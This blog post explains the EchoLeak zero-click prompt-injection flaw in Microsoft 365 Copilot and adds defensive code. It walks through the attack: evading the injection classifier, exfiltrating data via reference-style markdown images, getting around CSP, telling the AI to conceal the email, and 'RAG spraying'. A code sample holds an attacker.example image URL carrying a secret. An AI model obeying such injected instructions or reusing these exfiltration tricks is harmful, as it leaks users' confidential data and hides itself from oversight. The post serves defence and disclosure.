Copilot AI: The First Zero-click Security Vulnerability

Nam Anh Mai D.

Recently, security researchers at Aim Labs disclosed the first zero-click security vulnerability in Copilot AI, marking a new and challenging phase for global cybersecurity. Known as EchoLeak, this vulnerability directly affects the AI system integrated into Microsoft 365 Copilot and allows attackers to extract sensitive data without any user interaction.

Vulnerability Information

Copilot AI, the assistant integrated into Microsoft Office that can summarize emails, draft documents, and analyze spreadsheets, has recently become a hot topic in the security community because of a newly discovered vulnerability. The flaw allows an attacker to extract sensitive information by simply sending the victim an email, with no interaction from the victim required.

  • Vulnerability Identifier: EchoLeak - CVE-2025-32711

  • CVSS Score (3.1): 9.3

  • Severity Level: CRITICAL

  • General Description: The vulnerability allows hackers to perform command injection in Microsoft 365 Copilot AI, leading to the leakage of sensitive information.

Attack Chain & Exploitation Method

Figure 1: Attack Chain - Source: Aim Labs

Step 1: Bypass XPIA

Microsoft's cross-prompt injection attack (XPIA) classifier acts as a filtering layer meant to stop prompt injection attacks that arrive inside content such as emails. However, according to Aim Labs' research, this mechanism was easily bypassed with a cleverly disguised email containing a malicious prompt injection. To evade the XPIA classifier, the email content never mentions AI, virtual assistants, Copilot, etc., so the classifier does not identify the email as malicious.

Step 2: Bypass link redaction

To extract sensitive data through M365 Copilot, the attacker needs a channel to carry the information out. The initial idea is to embed a link to the attacker's server in Copilot's response, with query parameters carrying the sensitive information the LLM has gathered. However, Copilot automatically redacts markdown links that point outside the tenant, so users cannot click on them.

Nevertheless, this mechanism has a flaw: reference-style markdown links are neither detected nor removed. The attacker can use this alternative markdown syntax to insert malicious links that remain fully visible and functional.

By exploiting these uncontrolled markdown variations, the attacker can bypass Copilot's protection layer and establish a data leakage channel.

Figure 2: Bypassing link redaction mechanism - Source: Aim Labs

Step 3: Bypass image redaction mechanism

Instead of relying on users clicking on links, the attacker can switch to markdown images to extract data automatically. When an image is embedded in Copilot's response, the browser loads it on its own, so the data leaves without any user interaction.

Although Copilot also redacts regular markdown images, reference-style markdown once again becomes a weakness: images written with this syntax are not removed. The attacker can place the sensitive data in the query string of the image URL, and the browser sends that URL in an outbound HTTP request when it fetches the image.

However, Microsoft's next line of defense is the Content-Security-Policy (CSP), which restricts image sources (img-src) to allowed domains only, so an image pointing at an arbitrary external server is never loaded by the browser even when the redaction step misses it.
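Steps 2 and 3 both come down to a redaction filter that understands only inline markdown. The following added example (my own code, not Aim Labs' or Microsoft's) puts a naive inline-only filter next to one that also resolves reference-style definitions, so that a link or image to a host outside an allow list is removed whichever syntax carries it. The allow list, the host names and the sample response are constructed for the example.

```python
"""Markdown redaction that also covers reference-style links and images.

Added example, not code from Aim Labs or Microsoft: a naive filter that only
matches inline markdown, beside one that also resolves reference-style
definitions, so a model response cannot carry data out in a URL to a host
outside the allow list. The allow list and the sample response are constructed.
"""
import re
from urllib.parse import urlsplit

# Inline forms: [text](url) and ![alt](url), with an optional title after the URL.
INLINE_RE = re.compile(r'(!?)\[([^\]]*)\]\(\s*(<[^>]*>|[^\s)]+)[^)]*\)')
# Reference definition on its own line: [id]: url "optional title"
REF_DEF_RE = re.compile(r'^[ ]{0,3}\[([^\]]+)\]:[ \t]*(<[^>]*>|\S+)[^\n]*$', re.MULTILINE)
# Reference usage: [text][id], [text][] or the shortcut [id]; the lookahead
# keeps us from touching the [text] part of an inline link.
REF_USE_RE = re.compile(r'(!?)\[([^\]]*)\](?:\[([^\]]*)\])?(?!\()')

REDACTED = "[external link removed]"
ALLOWED_HOSTS = ("contoso.sharepoint.com",)   # constructed allow list


def _is_allowed(url, allowed_hosts):
    host = (urlsplit(url.strip("<>")).hostname or "").lower()
    if not host:
        return True   # relative URL: cannot reach an outside server on its own
    return any(host == a or host.endswith("." + a) for a in allowed_hosts)


def naive_redact(text, allowed_hosts=ALLOWED_HOSTS):
    """Handles only inline [text](url) / ![alt](url); reference-style slips through."""
    def sub(m):
        return m.group(0) if _is_allowed(m.group(3), allowed_hosts) else REDACTED
    return INLINE_RE.sub(sub, text)


def redact(text, allowed_hosts=ALLOWED_HOSTS):
    """Redacts inline *and* reference-style links/images to non-allowed hosts."""
    bad_ids = set()

    # 1. Drop reference definitions that point outside the allow list; remember their ids.
    def def_sub(m):
        ref_id, url = m.group(1).strip().lower(), m.group(2)
        if _is_allowed(url, allowed_hosts):
            return m.group(0)
        bad_ids.add(ref_id)
        return ""
    text = REF_DEF_RE.sub(def_sub, text)

    # 2. Inline links and images.
    text = naive_redact(text, allowed_hosts)

    # 3. Usages that referred to a dropped definition.
    def use_sub(m):
        label, ref = m.group(2), m.group(3)
        ref_id = (ref if ref else label).strip().lower()
        return REDACTED if ref_id in bad_ids else m.group(0)
    return REF_USE_RE.sub(use_sub, text)


# Constructed model response: one allowed link, one inline external image and
# one reference-style external image carrying a made-up secret in its query string.
SAMPLE_RESPONSE = """Here is the leave policy summary you asked for.

See the [HR handbook](https://contoso.sharepoint.com/sites/hr/handbook.pdf).

![chart](https://attacker.example/chart.png?v=1)

![status][img1]

[img1]: https://attacker.example/collect.png?d=PROJECT-CODENAME-REDWOOD
"""

if __name__ == "__main__":
    print("naive:", naive_redact(SAMPLE_RESPONSE))
    print("full:", redact(SAMPLE_RESPONSE))
```

The naive filter keeps the reference definition and its usage intact, so the secret in the query string survives; the full filter removes the definition first and then the usage that pointed at it. As Step 4 shows, an allow list is only as strong as its entries: a host that will fetch arbitrary URLs on the attacker's behalf must not be on it.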

Step 4: Bypass CSP using SharePoint

The attacker first tries to relay the extracted data outside through Microsoft SharePoint, which the CSP allows, but this route requires the user to accept an access invitation, which is impractical. The research team then discovered that Microsoft Teams allows the data to be sent out without any user action, so the attack can extract sensitive data fully automatically.

Finally, to cover their tracks, the attacker simply instructs the AI never to mention the email containing the malicious instructions in any response, which makes the attack very hard to detect.

Step 5: Exploitation

The attacker exploits the flaw through two main techniques: RAG Spraying and LLM Scope Violation.

With RAG Spraying, the attacker's goal is to make sure the malicious email is retrieved by the AI whenever the user asks any question. The attacker prepares a very long email divided into many small sections, each resembling an ordinary guide document (on HR, leave policies, FAQs, etc.), and embeds the prompt injection instructions among them. Because the email covers so many topics, one of its sections is retrieved by Copilot in almost any situation, regardless of what the user asks for.

LLM Scope Violation, in turn, comes into play once the malicious email has been retrieved by Copilot. Because Copilot has access to internal documents, the instructions attached to the email can direct it to gather sensitive data from that privileged context, which the email's untrusted content should never have been able to reach.
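A sprayed email leaves a characteristic trace in retrieval logs: one document from an outside sender keeps appearing across unrelated queries, each time through a different section, whereas a genuinely popular internal FAQ is retrieved again and again through the same chunk. The following added example is my own detection heuristic, not something Aim Labs or Microsoft describe; it assumes the RAG layer logs one row per retrieved chunk with a query id, document id, chunk id and sender domain, and the log lines, document ids and domains are all constructed.

```python
"""Retrieval-log heuristic for spotting RAG spraying.

Added example, not from Aim Labs or Microsoft: it assumes the RAG layer logs
one row per retrieved chunk (query id, source document, chunk id, sender
domain) and flags documents that keep showing up across unrelated queries
through *different* chunks, which is what a sprayed email looks like. A
genuinely popular FAQ is retrieved through the same chunk and is not flagged.
The log lines and domains are constructed.
"""
import csv
import io
from collections import defaultdict

INTERNAL_DOMAINS = {"contoso.com"}   # constructed

# Constructed log: eight user queries; mail-7731 is an external email that is
# pulled into six of them, each time via a different chunk; faq-general is an
# internal document pulled into five of them, always via the same chunk.
RETRIEVAL_LOG = """query_id,doc_id,chunk_id,sender_domain
q01,mail-7731,c01,outside.example
q01,wiki-hr-leave,c01,contoso.com
q02,mail-7731,c04,outside.example
q02,wiki-it-vpn,c02,contoso.com
q03,mail-7731,c09,outside.example
q03,faq-general,c01,contoso.com
q04,mail-7731,c12,outside.example
q04,faq-general,c01,contoso.com
q05,mail-7731,c15,outside.example
q05,wiki-fin-expenses,c03,contoso.com
q06,faq-general,c01,contoso.com
q06,wiki-hr-leave,c02,contoso.com
q07,mail-7731,c20,outside.example
q07,faq-general,c01,contoso.com
q08,wiki-it-vpn,c01,contoso.com
q08,faq-general,c01,contoso.com
"""


def spray_candidates(log_text, share_threshold=0.5, diversity_threshold=0.6, min_queries=3):
    """Return documents whose retrieval pattern looks like spraying, highest share first."""
    queries_by_doc = defaultdict(set)
    chunks_by_doc = defaultdict(set)
    sender_by_doc = {}
    all_queries = set()
    for row in csv.DictReader(io.StringIO(log_text)):
        all_queries.add(row["query_id"])
        queries_by_doc[row["doc_id"]].add(row["query_id"])
        chunks_by_doc[row["doc_id"]].add(row["chunk_id"])
        sender_by_doc[row["doc_id"]] = row["sender_domain"]

    total = len(all_queries)
    findings = []
    for doc, qs in queries_by_doc.items():
        if len(qs) < min_queries:
            continue
        share = len(qs) / total                        # fraction of all queries that pulled this doc
        diversity = len(chunks_by_doc[doc]) / len(qs)  # distinct chunks per query hit
        if share >= share_threshold and diversity >= diversity_threshold:
            findings.append({
                "doc_id": doc,
                "share": share,
                "diversity": diversity,
                "external": sender_by_doc[doc] not in INTERNAL_DOMAINS,
            })
    return sorted(findings, key=lambda f: -f["share"])


if __name__ == "__main__":
    for finding in spray_candidates(RETRIEVAL_LOG):
        print(finding)
```

The two thresholds are the knobs to tune per tenant: the share threshold catches documents that are retrieved far more often than their topic would justify, and the diversity threshold separates a sprayed email (many distinct chunks) from a legitimately popular document (one chunk hit repeatedly). A flagged document from an external sender is a candidate for quarantine and for a closer look at the Copilot responses produced while it was in context.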

Mitigation & Recommendations

EchoLeak is a new and representative case of AI model exploitation. To avoid the risks associated with this new threat, users should:

  1. Limit internal AI (Copilot) access: Grant only necessary permissions and avoid allowing AI to access all emails, documents, or sensitive data without control.

  2. Improve content filtering and prevent prompt injection: Implement advanced moderation to detect malicious requests, even if they don't directly mention keywords like "AI" or "Copilot."

  3. Block access to untrusted external links: Strengthen content security policies (CSP), and redact reference-style Markdown as well as the inline form, so that links cannot hide inside images or guides.

  4. Monitor and log all AI activities: Track user queries and AI responses to detect unusual behavior and trace when needed.

  5. Train users and raise awareness: Warn about risks from strange emails, unclear AI requests, and encourage reporting any abnormalities.

References

  1. Aim Labs, EchoLeak blog post